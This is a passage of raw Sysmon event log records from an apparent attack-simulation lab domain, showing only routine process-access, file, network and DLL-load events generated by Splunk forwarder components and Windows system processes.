Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2260BB6C97FD98299A01487BD35029A4,SHA256=7F2E13A5E626B71ECAFC31F929E5620F9C3F005D836868D246FA0238D063AA3Ffalsefalse - insufficient disk space 
10341000x80000000000000001061174Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:28.057{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061173Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:28.057{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061179Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:29.553{761B69BB-8200-607D-A100-00000000BA01}4148NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001061178Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:29.171{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10ED6AD9CF4B5CC967C8482DDE26D8FF,SHA256=CB14B20C5E2AB16044E84B90850CED4333B2E642108F1DE6101954FF0A32C6F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001530993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.600{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64689-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001530992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:29.049{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:29.049{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB9E6ED731FED86068C068BE439E7CD,SHA256=5D9923DEA349E663A0A99BE6A3EC1BB463D0096ACC224ACEB6DFBD78D6DE71B1falsefalse - insufficient disk space 10341000x80000000000000001061177Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:29.058{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061176Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:29.058{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061183Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.175{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E195A2FFE554A3AFB1C7D2409785B3CB,SHA256=B23F32812C12DCC96CB5E9B8E2F04C68277152F493243ADE58D3CF921E100BC9,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:30.100{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:30.100{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C941ABB7DA7F0E035D452CA9B3DFF8D,SHA256=0E361A3EC0E73FC463469734C09D211D5E8BED816B1A5B56D0F1BA4DA62CB246falsefalse - insufficient disk space 10341000x80000000000000001061182Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.059{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061181Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:30.059{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061180Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.055{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27C00FEFA3CB87C06EDEECA3D06B8662,SHA256=33FA85B4A43A97163679A6394E75EE67042910F3F66209C105C02FEEAA19C50B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061188Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:26.222{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1300-false10.0.1.12-8089- 354300x80000000000000001061187Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:25.735{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1299-false10.0.1.12-8000- 23542300x80000000000000001061186Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:31.179{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B39127A5336AFF54C79BAC5D787E897,SHA256=740859BD3D3E5A8144758ACC515F7D7F71D74AEB667294D92E8BA0F0867C39B8,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001531101Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531100Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531099Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 
734700x80000000000000001531098Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531097Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531096Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531095Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531094Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531093Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531092Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531091Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531090Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531089Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531088Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531087Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001531086Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531085Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001531084Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 
734700x80000000000000001531083Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531082Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 
734700x80000000000000001531079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531072Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001531071Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program 